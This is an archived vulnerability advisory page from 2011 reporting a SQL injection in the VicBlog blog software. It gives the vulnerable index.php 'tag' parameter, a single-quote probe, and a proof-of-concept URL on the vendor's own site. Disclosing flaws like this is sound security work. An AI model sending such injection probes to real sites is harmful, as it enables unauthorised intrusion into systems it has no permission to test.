VicBlog SQL Injection

VicBlog SQL Injection: Posted Aug 24, 2011; Authored by Eyup CELIK; VicBlog suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 0f4a06b231d5fd6de81b727dc6e18a4b8725910b928aa3274480e8422e3ca978; Download | Favorite | View

VicBlog SQL Injection

# Exploit Title: VicBlog SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Software Link: https://www.vicdesigns.com.au
# Version: All Version
# Tested on: All versions are Vulnerability

ISSUE

SQL Injection can be done using the command input

Vulnerable Page:
index.php

Example:
index.php?page=posts&tag=<SQL Injection Code>

Exploit:
index.php/1'

POC:
https://www.vicdesigns.com.au/vicblog/index.php?page=posts&tag=1%27


Thanks,


Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
https://www.eyupcelik.com.tr

Top Authors In Last 30 Days

Red Hat 300 files
Ubuntu 63 files
Debian 20 files
LiquidWorm 19 files
Apple 9 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files
nu11secur1ty 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,928)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,326)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,981)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

VicBlog SQL Injection

VicBlog SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

VicBlog SQL Injection

Share This

VicBlog SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems